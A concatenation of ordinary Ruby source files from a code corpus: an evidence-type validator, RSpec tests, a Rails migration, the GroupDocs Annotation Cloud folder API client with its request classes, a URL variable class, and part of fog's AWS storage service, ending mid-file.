record.errors.add :evidence_type, "Invalid evidence type: #{record.evidence_type}"
return
end
if !validator[:clinical_significance].include? record.clinical_significance
record.errors.add :clinical_significance, "Not a valid clinical significance for #{record.evidence_type} evidence type: #{record.clinical_significance}. Valid values: #{validator[:clinical_significance].join(', ')}"
end
if !validator[:evidence_direction].include? record.evidence_direction
record.errors.add :evidence_direction, "Not a valid evidence direction for #{record.evidence_type} evidence type: #{record.evidence_direction}. Valid values: #{validator[:evidence_direction].join(', ')}"
end
if validator[:disease] && !record.disease_id
record.errors.add :disease_id, "Disease required for #{record.evidence_type} evidence type"
elsif !validator[:disease] && record.disease_id
record.errors.add :disease_id, "Disease cannot be set for #{record.evidence_type} evidence type"
end
if validator[:drug] && record.drug_ids.blank?
record.errors.add :drug_ids, "Drug(s) required for #{record.evidence_type} evidence type"
elsif !validator[:drug] && !record.drug_ids.blank?
record.errors.add :drug_ids, "Drug(s) cannot be set for #{record.evidence_type} evidence type"
end
if record.drug_ids.size > 1 && !record.drug_interaction_type
record.errors.add :drug_interaction_type, "Multiple drugs set but no drug interaction type provided"
end
if record.drug_ids.size < 2 && record.drug_interaction_type
record.errors.add :drug_interaction_type, "Drug interaction type cannot be set unless multiple drugs are specified."
end
end
def valid_types
@valid_types ||= {
'Predictive' => {
clinical_significance: ['Sensitivity/Response', 'Resistance', 'Adverse Response', 'Reduced Sensitivity', 'N/A'],
evidence_direction: ['Supports', 'Does Not Support'],
disease: true,
drug: true,
},
'Diagnostic' => {
clinical_significance: ['Positive', 'Negative'],
evidence_direction: ['Supports', 'Does Not Support'],
disease: true,
drug: false
},
'Prognostic' => {
clinical_significance: ['Better Outcome', 'Poor Outcome', 'N/A'],
evidence_direction: ['Supports', 'Does Not Support'],
disease: true,
drug: false
},
'Predisposing' => {
clinical_significance: ['N/A'],
evidence_direction: ['N/A'],
disease: true,
drug: false
},
'Oncogenic' => {
clinical_significance: ['N/A'],
evidence_direction: ['N/A'],
disease: true,
drug: false
},
'Functional' => {
clinical_significance: ['Gain of Function', 'Loss of Function', 'Unaltered Function', 'Neomorphic', 'Dominant Negative', 'Unknown'],
evidence_direction: ['Supports', 'Does Not Support'],
disease: false,
drug: false
},
}
end
end
| 39.7 | 221 | 0.664043 |
ac3967f4f77303ebe558a1a5f3d00697988cad19 | 1,145 | # frozen_string_literal: true
require 'spec_helper'
describe Ci::TriggerPresenter do
set(:user) { create(:user) }
set(:project) { create(:project) }
set(:trigger) do
create(:ci_trigger, token: '123456789abcd', project: project)
end
subject do
described_class.new(trigger, current_user: user)
end
before do
project.add_maintainer(user)
end
context 'when user is not a trigger owner' do
describe '#token' do
it 'exposes only short token' do
expect(subject.token).not_to eq trigger.token
expect(subject.token).to eq '1234'
end
end
describe '#has_token_exposed?' do
it 'does not have token exposed' do
expect(subject).not_to have_token_exposed
end
end
end
context 'when user is a trigger owner and builds admin' do
before do
trigger.update(owner: user)
end
describe '#token' do
it 'exposes full token' do
expect(subject.token).to eq trigger.token
end
end
describe '#has_token_exposed?' do
it 'has token exposed' do
expect(subject).to have_token_exposed
end
end
end
end
| 21.203704 | 65 | 0.657642 |
28a5cf8ca43661f0987c13b0fd51a09b7e65a91b | 297 | # frozen_string_literal: true
require 'spec_helper'
describe 'Tracking activity with ahoy' do
it 'stores specified action' do
3.times { visit test_index_path }
Ahoy::Event.take(3).each do |elem|
expect(elem.name).to eq 'index action of test controller invoked'
end
end
end
| 22.846154 | 71 | 0.717172 |
626bea0c626495aab656f947b0fb33512a9698c2 | 152 | class RemoveTermsOfServiceFromEventsSignUps < ActiveRecord::Migration[5.0]
def change
remove_column :events_sign_ups, :terms_of_service
end
end
| 25.333333 | 74 | 0.815789 |
e971a607a53391cf3246cc5857b760379351ed5e | 30,228 | # -----------------------------------------------------------------------------------
# <copyright company="Aspose Pty Ltd" file="folder.rb">
# Copyright (c) 2003-2021 Aspose Pty Ltd
# </copyright>
# <summary>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# </summary>
# -----------------------------------------------------------------------------------
require 'uri'
require 'date'
module GroupDocsAnnotationCloud
  #
  # GroupDocs.Annotation Cloud API
  #
  # Storage folder operations: copy, create, delete, move and listing of a
  # folder's contents. Instances must be created through the +from_keys+ or
  # +from_config+ factory methods; +new+ is private.
  #
  class FolderApi
    attr_accessor :config

    #make FolderApi.new private
    private_class_method :new

    # Initializes new instance of FolderApi
    #
    # @param [config] Configuration
    # @return [FolderApi] New instance of FolderApi
    def initialize(config)
      @config = config
      @api_client = ApiClient.new(config)
      @access_token = nil
    end

    # Initializes new instance of FolderApi
    #
    # @param [app_sid] Application identifier (App SID)
    # @param [app_key] Application private key (App Key)
    # @return [FolderApi] New instance of FolderApi
    def self.from_keys(app_sid, app_key)
      config = Configuration.new(app_sid, app_key)
      new(config)
    end

    # Initializes new instance of FolderApi
    #
    # @param [config] Configuration
    # @return [FolderApi] New instance of FolderApi
    def self.from_config(config)
      new(config)
    end

    # Copy folder
    #
    # @param request copy_folder_request
    # @return [nil]
    def copy_folder(request)
      copy_folder_with_http_info(request)
      nil
    end

    # Copy folder
    #
    # @param request copy_folder_request
    # @return [Array<(nil, Fixnum, Hash)>]
    #   nil, response status code and response headers
    def copy_folder_with_http_info(request)
      raise ArgumentError, 'Incorrect request type' unless request.is_a? CopyFolderRequest

      @api_client.config.logger.debug 'Calling API: FolderApi.copy_folder ...' if @api_client.config.debugging
      # verify the required parameter 'src_path' is set
      raise ArgumentError, 'Missing the required parameter src_path when calling FolderApi.copy_folder' if @api_client.config.client_side_validation && request.src_path.nil?
      # verify the required parameter 'dest_path' is set
      raise ArgumentError, 'Missing the required parameter dest_path when calling FolderApi.copy_folder' if @api_client.config.client_side_validation && request.dest_path.nil?
      # resource path
      local_var_path = '/annotation/storage/folder/copy/{srcPath}'
      local_var_path = local_var_path.sub('{' + downcase_first_letter('srcPath') + '}', request.src_path.to_s)
      # query parameters
      query_params = {}
      query_params[downcase_first_letter('destPath')] = request.dest_path
      local_var_path = resolve_optional_param(local_var_path, query_params, 'srcStorageName', request.src_storage_name)
      local_var_path = resolve_optional_param(local_var_path, query_params, 'destStorageName', request.dest_storage_name)
      # header parameters
      header_params = json_headers
      # form parameters
      form_params = {}
      # http body (model)
      post_body = nil
      data, status_code, headers = @api_client.call_api(:PUT, local_var_path,
                                                        header_params: header_params,
                                                        query_params: query_params,
                                                        form_params: form_params,
                                                        body: post_body,
                                                        access_token: get_access_token)
      if @api_client.config.debugging
        @api_client.config.logger.debug "API called:
        FolderApi#copy_folder\nData: #{data.inspect}\nStatus code: #{status_code}\nHeaders: #{headers}"
      end
      [data, status_code, headers]
    end

    # Create the folder
    #
    # @param request create_folder_request
    # @return [nil]
    def create_folder(request)
      create_folder_with_http_info(request)
      nil
    end

    # Create the folder
    #
    # @param request create_folder_request
    # @return [Array<(nil, Fixnum, Hash)>]
    #   nil, response status code and response headers
    def create_folder_with_http_info(request)
      raise ArgumentError, 'Incorrect request type' unless request.is_a? CreateFolderRequest

      @api_client.config.logger.debug 'Calling API: FolderApi.create_folder ...' if @api_client.config.debugging
      # verify the required parameter 'path' is set
      raise ArgumentError, 'Missing the required parameter path when calling FolderApi.create_folder' if @api_client.config.client_side_validation && request.path.nil?
      # resource path
      local_var_path = '/annotation/storage/folder/{path}'
      local_var_path = local_var_path.sub('{' + downcase_first_letter('path') + '}', request.path.to_s)
      # query parameters
      query_params = {}
      local_var_path = resolve_optional_param(local_var_path, query_params, 'storageName', request.storage_name)
      # header parameters
      header_params = json_headers
      # form parameters
      form_params = {}
      # http body (model)
      post_body = nil
      data, status_code, headers = @api_client.call_api(:PUT, local_var_path,
                                                        header_params: header_params,
                                                        query_params: query_params,
                                                        form_params: form_params,
                                                        body: post_body,
                                                        access_token: get_access_token)
      if @api_client.config.debugging
        @api_client.config.logger.debug "API called:
        FolderApi#create_folder\nData: #{data.inspect}\nStatus code: #{status_code}\nHeaders: #{headers}"
      end
      [data, status_code, headers]
    end

    # Delete folder
    #
    # @param request delete_folder_request
    # @return [nil]
    def delete_folder(request)
      delete_folder_with_http_info(request)
      nil
    end

    # Delete folder
    #
    # @param request delete_folder_request
    # @return [Array<(nil, Fixnum, Hash)>]
    #   nil, response status code and response headers
    def delete_folder_with_http_info(request)
      raise ArgumentError, 'Incorrect request type' unless request.is_a? DeleteFolderRequest

      @api_client.config.logger.debug 'Calling API: FolderApi.delete_folder ...' if @api_client.config.debugging
      # verify the required parameter 'path' is set
      raise ArgumentError, 'Missing the required parameter path when calling FolderApi.delete_folder' if @api_client.config.client_side_validation && request.path.nil?
      # resource path
      local_var_path = '/annotation/storage/folder/{path}'
      local_var_path = local_var_path.sub('{' + downcase_first_letter('path') + '}', request.path.to_s)
      # query parameters
      query_params = {}
      local_var_path = resolve_optional_param(local_var_path, query_params, 'storageName', request.storage_name)
      local_var_path = resolve_optional_param(local_var_path, query_params, 'recursive', request.recursive)
      # header parameters
      header_params = json_headers
      # form parameters
      form_params = {}
      # http body (model)
      post_body = nil
      data, status_code, headers = @api_client.call_api(:DELETE, local_var_path,
                                                        header_params: header_params,
                                                        query_params: query_params,
                                                        form_params: form_params,
                                                        body: post_body,
                                                        access_token: get_access_token)
      if @api_client.config.debugging
        @api_client.config.logger.debug "API called:
        FolderApi#delete_folder\nData: #{data.inspect}\nStatus code: #{status_code}\nHeaders: #{headers}"
      end
      [data, status_code, headers]
    end

    # Get all files and folders within a folder
    #
    # @param request get_files_list_request
    # @return [FilesList]
    def get_files_list(request)
      data, _status_code, _headers = get_files_list_with_http_info(request)
      data
    end

    # Get all files and folders within a folder
    #
    # @param request get_files_list_request
    # @return [Array<(FilesList, Fixnum, Hash)>]
    #   FilesList data, response status code and response headers
    def get_files_list_with_http_info(request)
      raise ArgumentError, 'Incorrect request type' unless request.is_a? GetFilesListRequest

      @api_client.config.logger.debug 'Calling API: FolderApi.get_files_list ...' if @api_client.config.debugging
      # verify the required parameter 'path' is set
      raise ArgumentError, 'Missing the required parameter path when calling FolderApi.get_files_list' if @api_client.config.client_side_validation && request.path.nil?
      # resource path
      local_var_path = '/annotation/storage/folder/{path}'
      local_var_path = local_var_path.sub('{' + downcase_first_letter('path') + '}', request.path.to_s)
      # query parameters
      query_params = {}
      local_var_path = resolve_optional_param(local_var_path, query_params, 'storageName', request.storage_name)
      # header parameters
      header_params = json_headers
      # form parameters
      form_params = {}
      # http body (model)
      post_body = nil
      data, status_code, headers = @api_client.call_api(:GET, local_var_path,
                                                        header_params: header_params,
                                                        query_params: query_params,
                                                        form_params: form_params,
                                                        body: post_body,
                                                        access_token: get_access_token,
                                                        return_type: 'FilesList')
      if @api_client.config.debugging
        @api_client.config.logger.debug "API called:
        FolderApi#get_files_list\nData: #{data.inspect}\nStatus code: #{status_code}\nHeaders: #{headers}"
      end
      [data, status_code, headers]
    end

    # Move folder
    #
    # @param request move_folder_request
    # @return [nil]
    def move_folder(request)
      move_folder_with_http_info(request)
      nil
    end

    # Move folder
    #
    # @param request move_folder_request
    # @return [Array<(nil, Fixnum, Hash)>]
    #   nil, response status code and response headers
    def move_folder_with_http_info(request)
      raise ArgumentError, 'Incorrect request type' unless request.is_a? MoveFolderRequest

      @api_client.config.logger.debug 'Calling API: FolderApi.move_folder ...' if @api_client.config.debugging
      # verify the required parameter 'src_path' is set
      raise ArgumentError, 'Missing the required parameter src_path when calling FolderApi.move_folder' if @api_client.config.client_side_validation && request.src_path.nil?
      # verify the required parameter 'dest_path' is set
      raise ArgumentError, 'Missing the required parameter dest_path when calling FolderApi.move_folder' if @api_client.config.client_side_validation && request.dest_path.nil?
      # resource path
      local_var_path = '/annotation/storage/folder/move/{srcPath}'
      local_var_path = local_var_path.sub('{' + downcase_first_letter('srcPath') + '}', request.src_path.to_s)
      # query parameters
      query_params = {}
      query_params[downcase_first_letter('destPath')] = request.dest_path
      local_var_path = resolve_optional_param(local_var_path, query_params, 'srcStorageName', request.src_storage_name)
      local_var_path = resolve_optional_param(local_var_path, query_params, 'destStorageName', request.dest_storage_name)
      # header parameters
      header_params = json_headers
      # form parameters
      form_params = {}
      # http body (model)
      post_body = nil
      data, status_code, headers = @api_client.call_api(:PUT, local_var_path,
                                                        header_params: header_params,
                                                        query_params: query_params,
                                                        form_params: form_params,
                                                        body: post_body,
                                                        access_token: get_access_token)
      if @api_client.config.debugging
        @api_client.config.logger.debug "API called:
        FolderApi#move_folder\nData: #{data.inspect}\nStatus code: #{status_code}\nHeaders: #{headers}"
      end
      [data, status_code, headers]
    end

    #
    # Helper method to convert first letter to downcase
    #
    private def downcase_first_letter(str)
      str[0].downcase + str[1..-1]
    end

    #
    # Applies an optional request parameter: when the resource path contains
    # the parameter's placeholder it is substituted in place (nil becomes an
    # empty string, as before); otherwise the value is added to query_params
    # unless it is nil. Returns the (possibly updated) resource path.
    #
    private def resolve_optional_param(local_var_path, query_params, name, value)
      key = downcase_first_letter(name)
      placeholder = '{' + key + '}'
      if local_var_path.include? placeholder
        local_var_path.sub(placeholder, value.to_s)
      else
        query_params[key] = value unless value.nil?
        local_var_path
      end
    end

    #
    # Builds the standard JSON 'Accept'/'Content-Type' request headers.
    #
    private def json_headers
      {
        'Accept' => @api_client.select_header_accept(['application/json']),
        'Content-Type' => @api_client.select_header_content_type(['application/json'])
      }
    end

    #
    # Retrieves access token, requesting a fresh one when none is cached or
    # when the cached token has expired. (Fix: @access_token_expires_at was
    # recorded by request_access_token but never consulted, so an expired
    # token was reused indefinitely.)
    #
    private def get_access_token
      if @access_token.nil? || (@access_token_expires_at && @access_token_expires_at <= DateTime.now)
        request_access_token
      end
      @access_token
    end

    #
    # Gets a access token from server via the OAuth2 client-credentials grant
    # and records its expiry time (with a five-minute safety margin).
    #
    private def request_access_token
      auth_config = Configuration.new(@config.app_sid, @config.app_key)
      auth_config.api_base_url = @config.api_base_url
      auth_config.debugging = @config.debugging
      auth_config.logger = @config.logger
      auth_config.temp_folder_path = @config.temp_folder_path
      auth_config.client_side_validation = @config.client_side_validation
      auth_config.api_version = ''
      auth_api_client = ApiClient.new(auth_config)
      request_url = "/connect/token"
      post_data = "grant_type=client_credentials&client_id=#{@config.app_sid}&client_secret=#{@config.app_key}"
      data, _status_code, _header = auth_api_client.call_api(:POST, request_url, :body => post_data, :return_type => 'Object')
      @access_token = data[:access_token]
      # refresh five minutes before the server-side expiry
      expires_in_seconds = data[:expires_in].to_i - 5 * 60
      expires_in_days = Rational(expires_in_seconds, 60 * 60 * 24)
      @access_token_expires_at = DateTime.now + expires_in_days
    end

    # requires all files inside a directory from current dir
    # @param _dir can be relative path like '/lib' or "../lib"
    private def require_all(_dir)
      Dir[File.expand_path(File.join(File.dirname(File.absolute_path(__FILE__)), _dir)) + "/*.rb"].each do |file|
        require file
      end
    end
  end
end
#
# --------------------------------------------------------------------------------------------------------------------
# <copyright company="Aspose Pty Ltd" file="copy_folder_request.rb">
# Copyright (c) 2003-2021 Aspose Pty Ltd
# </copyright>
# <summary>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# </summary>
# --------------------------------------------------------------------------------------------------------------------
#
module GroupDocsAnnotationCloud
  # Request model for copy_folder operation.
  #
  # Attributes:
  # * +src_path+          - source folder path, e.g. '/src'
  # * +dest_path+         - destination folder path, e.g. '/dst'
  # * +src_storage_name+  - source storage name (optional)
  # * +dest_storage_name+ - destination storage name (optional)
  class CopyFolderRequest
    attr_accessor :src_path, :dest_path, :src_storage_name, :dest_storage_name

    # Builds a copy_folder request.
    #
    # @param src_path Source folder path e.g. '/src'
    # @param dest_path Destination folder path e.g. '/dst'
    # @param src_storage_name Source storage name
    # @param dest_storage_name Destination storage name
    def initialize(src_path, dest_path, src_storage_name = nil, dest_storage_name = nil)
      @src_path = src_path
      @dest_path = dest_path
      @src_storage_name = src_storage_name
      @dest_storage_name = dest_storage_name
    end
  end
end
#
# --------------------------------------------------------------------------------------------------------------------
# <copyright company="Aspose Pty Ltd" file="create_folder_request.rb">
# Copyright (c) 2003-2021 Aspose Pty Ltd
# </copyright>
# <summary>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# </summary>
# --------------------------------------------------------------------------------------------------------------------
#
module GroupDocsAnnotationCloud
  # Request model for create_folder operation.
  #
  # Attributes:
  # * +path+         - folder path to create, e.g. 'folder_1/folder_2/'
  # * +storage_name+ - storage name (optional)
  class CreateFolderRequest
    attr_accessor :path, :storage_name

    # Builds a create_folder request.
    #
    # @param path Folder path to create e.g. 'folder_1/folder_2/'
    # @param storage_name Storage name
    def initialize(path, storage_name = nil)
      @path = path
      @storage_name = storage_name
    end
  end
end
#
# --------------------------------------------------------------------------------------------------------------------
# <copyright company="Aspose Pty Ltd" file="delete_folder_request.rb">
# Copyright (c) 2003-2021 Aspose Pty Ltd
# </copyright>
# <summary>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# </summary>
# --------------------------------------------------------------------------------------------------------------------
#
module GroupDocsAnnotationCloud
  # Request model for delete_folder operation.
  #
  # Attributes:
  # * +path+         - folder path, e.g. '/folder'
  # * +storage_name+ - storage name (optional)
  # * +recursive+    - enable to delete folders, subfolders and files (optional)
  class DeleteFolderRequest
    attr_accessor :path, :storage_name, :recursive

    # Builds a delete_folder request.
    #
    # @param path Folder path e.g. '/folder'
    # @param storage_name Storage name
    # @param recursive Enable to delete folders, subfolders and files
    def initialize(path, storage_name = nil, recursive = nil)
      @path = path
      @storage_name = storage_name
      @recursive = recursive
    end
  end
end
#
# --------------------------------------------------------------------------------------------------------------------
# <copyright company="Aspose Pty Ltd" file="get_files_list_request.rb">
# Copyright (c) 2003-2021 Aspose Pty Ltd
# </copyright>
# <summary>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# </summary>
# --------------------------------------------------------------------------------------------------------------------
#
module GroupDocsAnnotationCloud
  # Request model for get_files_list operation.
  #
  # Attributes:
  # * +path+         - folder path, e.g. '/folder'
  # * +storage_name+ - storage name (optional)
  class GetFilesListRequest
    attr_accessor :path, :storage_name

    # Builds a get_files_list request.
    #
    # @param path Folder path e.g. '/folder'
    # @param storage_name Storage name
    def initialize(path, storage_name = nil)
      @path = path
      @storage_name = storage_name
    end
  end
end
#
# --------------------------------------------------------------------------------------------------------------------
# <copyright company="Aspose Pty Ltd" file="move_folder_request.rb">
# Copyright (c) 2003-2021 Aspose Pty Ltd
# </copyright>
# <summary>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# </summary>
# --------------------------------------------------------------------------------------------------------------------
#
module GroupDocsAnnotationCloud
  # Request model for move_folder operation.
  #
  # Attributes:
  # * +src_path+          - folder path to move, e.g. '/folder'
  # * +dest_path+         - destination folder path to move to, e.g. '/dst'
  # * +src_storage_name+  - source storage name (optional)
  # * +dest_storage_name+ - destination storage name (optional)
  class MoveFolderRequest
    attr_accessor :src_path, :dest_path, :src_storage_name, :dest_storage_name

    # Builds a move_folder request.
    #
    # @param src_path Folder path to move e.g. '/folder'
    # @param dest_path Destination folder path to move to e.g '/dst'
    # @param src_storage_name Source storage name
    # @param dest_storage_name Destination storage name
    def initialize(src_path, dest_path, src_storage_name = nil, dest_storage_name = nil)
      @src_path = src_path
      @dest_path = dest_path
      @src_storage_name = src_storage_name
      @dest_storage_name = dest_storage_name
    end
  end
end
| 43.493525 | 175 | 0.636959 |
ed23b01fe636f653db04772f3c68fd11d108fd7a | 1,348 | require_relative 'base'
module Semi::Variables
  # URL-typed variable. Wraps a string that must look like an http/https/ftp
  # URL and exposes its components (proto, host, port, path, file, params)
  # via the named captures of @@url_re.
  class Url < Semi::Variables::Base
    @@url_re = Regexp.new('^(?<proto>https?|ftp):\/{2}(?!\/)(?<host>[a-z\.0-9\-_]+)?(?::(?<port>\d{1,5}))?\/?(?<path>.*?)\/?(?<file>[^\/\?]+)?(?:\?(?<params>.*?))?$', Regexp::IGNORECASE)

    # @param val [String] candidate URL
    # @raise [Semi::VariableError] if val does not match @@url_re
    def initialize(val)
      if @@url_re.match(val)
        @value = val
      else
        # Fix: the original used single quotes, so '#{val}' was emitted
        # literally instead of interpolating the offending value.
        raise Semi::VariableError, "#{val} does not look like a URL"
      end
    end

    # Validates the wrapped value.
    # Fix: must delegate to the class-level validator; the original called
    # self.validate(@value), invoking this zero-arity instance method with
    # an argument and raising ArgumentError.
    def validate
      self.class.validate(@value)
    end

    # Returns true when val is a String or Url whose string form matches
    # the URL pattern; false otherwise.
    def self.validate(val)
      if ['String', 'Semi::Variables::Url'].include? val.class.to_s
        return true if @@url_re.match(val.to_s)
      end
      false
    end

    # Component accessors: each returns the corresponding named capture of
    # the URL pattern, or nil when the value no longer matches.
    %w[proto host port path file params].each do |part|
      define_method(part) do
        match = @@url_re.match(@value)
        match[part] if match
      end
    end
  end
end
| 18.465753 | 186 | 0.505193 |
0307ccdaa317a2ed353f533e885b4471d932b32e | 14,568 | require 'fog/aws'
require 'fog/storage'
module Fog
module Storage
class AWS < Fog::Service
extend Fog::AWS::CredentialFetcher::ServiceMethods
requires :aws_access_key_id, :aws_secret_access_key
recognizes :endpoint, :region, :host, :path, :port, :scheme, :persistent, :use_iam_profile, :aws_session_token, :aws_credentials_expire_at
secrets :aws_secret_access_key, :hmac
model_path 'fog/aws/models/storage'
collection :directories
model :directory
collection :files
model :file
request_path 'fog/aws/requests/storage'
request :abort_multipart_upload
request :complete_multipart_upload
request :copy_object
request :delete_bucket
request :delete_bucket_cors
request :delete_bucket_lifecycle
request :delete_bucket_policy
request :delete_bucket_website
request :delete_object
request :delete_multiple_objects
request :get_bucket
request :get_bucket_acl
request :get_bucket_cors
request :get_bucket_lifecycle
request :get_bucket_location
request :get_bucket_logging
request :get_bucket_object_versions
request :get_bucket_policy
request :get_bucket_versioning
request :get_bucket_website
request :get_object
request :get_object_acl
request :get_object_torrent
request :get_object_http_url
request :get_object_https_url
request :get_object_url
request :get_request_payment
request :get_service
request :head_object
request :initiate_multipart_upload
request :list_multipart_uploads
request :list_parts
request :post_object_hidden_fields
request :put_bucket
request :put_bucket_acl
request :put_bucket_cors
request :put_bucket_lifecycle
request :put_bucket_logging
request :put_bucket_policy
request :put_bucket_versioning
request :put_bucket_website
request :put_object
request :put_object_acl
request :put_object_url
request :put_request_payment
request :sync_clock
request :upload_part
module Utils
attr_accessor :region
def cdn
@cdn ||= Fog::AWS::CDN.new(
:aws_access_key_id => @aws_access_key_id,
:aws_secret_access_key => @aws_secret_access_key,
:use_iam_profile => @use_iam_profile
)
end
def http_url(params, expires)
scheme_host_path_query(params.merge(:scheme => 'http', :port => 80), expires)
end
def https_url(params, expires)
scheme_host_path_query(params.merge(:scheme => 'https', :port => 443), expires)
end
def url(params, expires)
Fog::Logger.deprecation("Fog::Storage::AWS => #url is deprecated, use #https_url instead [light_black](#{caller.first})[/]")
https_url(params, expires)
end
private
def scheme_host_path_query(params, expires)
params[:scheme] ||= @scheme
if params[:port] == 80 && params[:scheme] == 'http'
params.delete(:port)
end
if params[:port] == 443 && params[:scheme] == 'https'
params.delete(:port)
end
params[:headers] ||= {}
params[:headers]['Date'] = expires.to_i
params[:path] = Fog::AWS.escape(params[:path]).gsub('%2F', '/')
query = []
params[:headers]['x-amz-security-token'] = @aws_session_token if @aws_session_token
if params[:query]
for key, value in params[:query]
query << "#{key}=#{Fog::AWS.escape(value)}"
end
end
query << "AWSAccessKeyId=#{@aws_access_key_id}"
query << "Signature=#{Fog::AWS.escape(signature(params))}"
query << "Expires=#{params[:headers]['Date']}"
query << "x-amz-security-token=#{Fog::AWS.escape(@aws_session_token)}" if @aws_session_token
port_part = params[:port] && ":#{params[:port]}"
"#{params[:scheme]}://#{params[:host]}#{port_part}/#{params[:path]}?#{query.join('&')}"
end
end
class Mock
include Utils
def self.acls(type)
case type
when 'private'
{
"AccessControlList" => [
{
"Permission" => "FULL_CONTROL",
"Grantee" => {"DisplayName" => "me", "ID" => "2744ccd10c7533bd736ad890f9dd5cab2adb27b07d500b9493f29cdc420cb2e0"}
}
],
"Owner" => {"DisplayName" => "me", "ID" => "2744ccd10c7533bd736ad890f9dd5cab2adb27b07d500b9493f29cdc420cb2e0"}
}
when 'public-read'
{
